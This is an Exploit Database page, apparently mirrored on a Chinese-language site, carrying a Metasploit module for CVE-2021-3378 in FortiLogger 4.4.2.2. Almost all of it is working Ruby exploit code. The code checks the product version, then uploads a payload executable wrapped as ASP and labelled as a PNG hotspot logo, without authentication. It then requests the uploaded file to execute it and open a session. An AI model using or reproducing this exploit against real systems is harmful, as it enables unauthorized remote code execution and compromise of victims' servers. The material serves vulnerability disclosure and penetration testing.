FortiLogger 4.4.2.2 – Unauthenticated Arbitrary File Upload (Metasploit)

• Exploit Database
• 38 阅读

• 作者： Berkan Er
  日期： 2021-03-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49600/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(
  update_info(
  info,
  'Name' => 'FortiLogger Arbitrary File Upload Exploit',
  'Description' => %q{
  This module exploits an unauthenticated arbitrary file upload
  via insecure POST request. It has been tested on version 4.4.2.2 in
  Windows 10 Enterprise.
  },
  'License' => MSF_LICENSE,
  'Author' =>
  [
  'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module
  ],
  'References' =>
  [
  ['CVE', '2021-3378'],
  ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']
  ],
  
  'Platform' => ['win'],
  'Privileged' => false,
  'Arch' => [ARCH_X86, ARCH_X64],
  'Targets' =>
  [
  [
  'FortiLogger - 4.4.2.2',
  {
  'Platform' => 'win'
  }
  ],
  ],
  'DisclosureDate' => '2021-02-26',
  'DefaultTarget' => 0
  )
  )
  
  register_options(
  [
  Opt::RPORT(5000),
  OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
  ], self.class
  )
  end
  
  def check_product_info
  res = send_request_cgi(
  'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),
  'method' => 'POST',
  'data' => '',
  'headers' => {
  'Accept' => 'application/json, text/javascript, */*; q=0.01',
  'Accept-Language' => 'en-US,en;q=0.5',
  'Accept-Encoding' => 'gzip, deflate',
  'X-Requested-With' => 'XMLHttpRequest'
  }
  )
  
  return res
  end
  
  def check
  begin
  res = check_product_info
  if res && res.code == 200
  if JSON.parse(res.body)['Version'] == '4.4.2.2'
  Exploit::CheckCode::Vulnerable
  else
  Exploit::CheckCode::Safe
  end
  end
  end
  end
  
  def create_payload
  Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s
  end
  
  def exploit
  begin
  print_good('Generate Payload !')
  data = create_payload
  
  boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
  post_data = "--#{boundary}\r\n"
  post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"b3r.asp\"\r\n"
  post_data << "Content-Type: image/png\r\n"
  post_data << "\r\n#{data}\r\n"
  post_data << "--#{boundary}\r\n"
  
  res = send_request_cgi(
  'method' => 'POST',
  'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
  'ctype' => "multipart/form-data; boundary=#{boundary}",
  'data' => post_data,
  'headers' => {
  'Accept' => 'application/json',
  'Accept-Language' => 'en-US,en;q=0.5',
  'X-Requested-With' => 'XMLHttpRequest'
  }
  )
  if res && res.code == 200
  if JSON.parse(res.body)['Message'] == 'Error in saving file'
  print_error('Error for upload payload..')
  else
  print_good('Payload has been uploaded !')
  
  handler
  
  print_status('Executing payload...')
  send_request_cgi({
  'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
  'method' => 'GET'
  }, 5)
  end
  end
  end
  end
  end